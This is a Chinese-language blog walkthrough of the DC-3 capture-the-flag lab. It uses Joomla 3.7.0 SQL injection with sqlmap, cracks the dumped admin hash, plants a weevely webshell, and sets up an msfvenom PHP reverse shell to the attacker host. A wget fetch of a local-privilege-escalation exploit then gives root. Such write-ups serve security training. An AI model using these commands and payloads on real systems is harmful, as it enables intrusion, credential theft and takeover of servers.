【DC】DC-3

kali:192.168.223.131
target:192.168.223.157

首先确定目标IP为192.168.223.157

arp-scan -l

image

nmap扫描开放端口,发现只开放了80

nmap -T4 -A 192.168.223.157 -p 1-65535 

image

whatweb判断网站模板,发现使用Joomla模板制作

whatweb http://192.168.223.157

对于这些出名的CMS,使用Joomla专门的扫描工具进行扫描

joomscan --url http://192.168.223.157

image

找到后台地址在/administrator,发现后台,但不知道用户名和密码

image

由于搜索出来是Joomla 3.7.0 ,搜索一下有没有对应版本的漏洞,找到一个sql注入漏洞,拷贝下来

searchsploit Joomla 3.7.0
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt 42033.txt

image

此时查看该txt文件,要求我们使用该语句进行操作

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image

修改一下localhost,使用sqlmap跑一下,稍等片刻,发现库名为joomladb

sqlmap -u "http://192/168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image

接着跑表名,发现很多表,最有可能的是 #__users表,由于有奇怪的符号,所以用双引号框起来

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

image

接下来跑列名,发现6列,最重要的name和password

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

image

进行信息榨取,获取用户名和密码为admin和$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering]

image

创建一个txt文件,将密码丢进去进行破解,获得密码为snoopy,登陆进去

touch pass.txt
john pass.txt

image

登陆进去后发现里面有可以编辑文件的地方,在Extensions—Templates—Templates中,点击一个模板,在里面添加文件并通过拼接获得文件路径

http://192.168.223.157/templates/beez3/html/com_contact/contact/haha.php

image

通过weevely生成密码123456的php木马,将其复制进去

weevely generate 123456 webshell.php

image

进行连接,通过使用/不使用冒号使用命令,是kali的一句话木马

weevely http://192.168.223.157/templates/beez3/html/com_contact/contact/haha.php 123456

image

查看Linux系统内核版本,是Ubuntu 16.04的版本

nmap -O 192.168.223.157
find / -user root -perm -4000 -print 2>/dev/null
lsb_release -a

image

对该版本进行漏洞搜索,查看如何处理,提示我们去GitHub下载

searchsploit Ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt 39772.txt

image

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

将该zip下载到kali,通过python开启的网站服务让目标下载

//kali
python -m SimpleHTTPServer 8000

//target
wget 192.168.223.131:8000/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

这里无法提权到root,换成msf

//terminal1
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.223.131 LPORT=4444 > msfshell.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
exploit

//terminal2
python -m SimpleHTTPServer 8000

//terminal3
wget 192.168.223.131:8000/msfshell.php

//访问网址
192.168.223.157/templates/beez3/html/com_contact/contact/msfshell.php

目标上线后再次进入39772文件运行doubleput文件,可以执行,提权至root

image

到root目录下查看flag,游戏结束

image

posted @ 2022-04-03 17:12  icui4cu  阅读(100)  评论(0编辑  收藏  举报